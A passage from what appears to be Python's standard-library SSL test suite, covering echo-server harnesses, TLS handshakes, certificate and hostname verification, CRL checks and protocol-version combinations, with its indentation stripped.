self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
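# Echo server used by the networked tests: each accepted connection is
# served by its own ConnectionHandler thread, which echoes received data
# back lower-cased and understands a few control commands (STARTTLS,
# ENDTLS, CB tls-unique, PHA, HASCERT, GETCERT) used by individual tests.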
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except (ConnectionResetError, ConnectionAbortedError):
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except ssl.SSLError as err:
# On Windows, test_pha_required_nocert sometimes receives the
# PEER_DID_NOT_RETURN_A_CERTIFICATE exception
# before the 'tlsv13 alert certificate required' exception.
# If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
# is received, test_pha_required_nocert fails with ConnectionResetError
# because the underlying socket is closed.
if 'PEER_DID_NOT_RETURN_A_CERTIFICATE' == err.reason:
if self.server.chatty and support.verbose:
sys.stdout.write(err.args[1])
# test_pha_required_nocert is expecting this exception
raise ssl.SSLError('tlsv13 alert certificate required')
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
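    # Accept loop.  The short accept timeout lets the loop re-check
    # self.active regularly so stop() takes effect promptly; every accepted
    # connection is served by its own ConnectionHandler thread.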
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
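# Alternative echo server built on asyncore, exercised by test_asyncore_server().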
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
    class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
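            # After the handshake has completed, echo incoming data back in
            # lower case, mirroring the ThreadedEchoServer behaviour.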
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
    def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
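# Helper shared by most tests below: it performs one full client/server
# exchange and returns a stats dict (cipher, compression, peercert, ALPN
# protocol, TLS version and session information).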
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
    If *expect_success* is true, assert that the connection succeeds;
    if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
            # If the OpenSSL configuration is strict and requires a more
            # recent TLS version, lower the server minimum so that old TLS
            # versions can still be tested.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError while the handshake isn't
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
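    # CRL handling: VERIFY_CRL_CHECK_LEAF must fail while no CRL is loaded
    # and succeed once the CA-signed CRL file has been loaded.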
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
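    # Handshake against a server that presents an ECDSA (ECC) certificate only.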
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
            # TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
